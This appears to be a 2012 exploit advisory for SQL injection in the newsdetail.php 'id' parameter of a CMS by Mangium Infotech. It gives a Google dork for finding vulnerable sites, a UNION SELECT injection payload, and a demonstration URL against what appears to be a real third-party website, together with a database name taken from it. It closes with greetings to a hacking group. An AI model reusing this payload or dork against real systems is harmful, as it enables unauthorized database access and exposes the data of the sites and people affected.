<!--
													  
   ________        .__        __________________     
   \_   ___ \_______|__| _____ \_____  \______   \   
   /    \  \/\_  __ \  |/     \  _(__  <|       _/   
   \     \____|  | \/  |  Y Y  \/       \    |   \   
    \______  /|__|  |__|__|_|  /______  /____|_  /   
           \/                \/       \/       \/    
											       
                                                   -->
# Exploit Title: Mangium Infotech cms Sql Injection Vulnerability
#
# Google Dork: Intext:" Powered by Mangium Infotech"
#
# Date: 08/29/2012
#
# Author: Crim3R
#
# Site : Http://Ajaxtm.com/
#
# Vendor Home : http://www.mangium.com/
#
# Tested on: all
#
==================================
[+] id parametr in newsdetail.php is Vulnerable to sql injection

[+]
	target/newsdetail.php?id=[id][+/*!union*/+/*!select*/+1,2,3,4,5,6--]

D3m0:

http://www.trishulblr.com/newsdetail.php?id=7+order+by+7--
DB_NAME : nmittal_tridatabase
===============Crim3R@Att.Net=========

[+] Greetz to All Ajaxtm Security Member

Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal
devilzc0der - Dominator - Hossein.R1369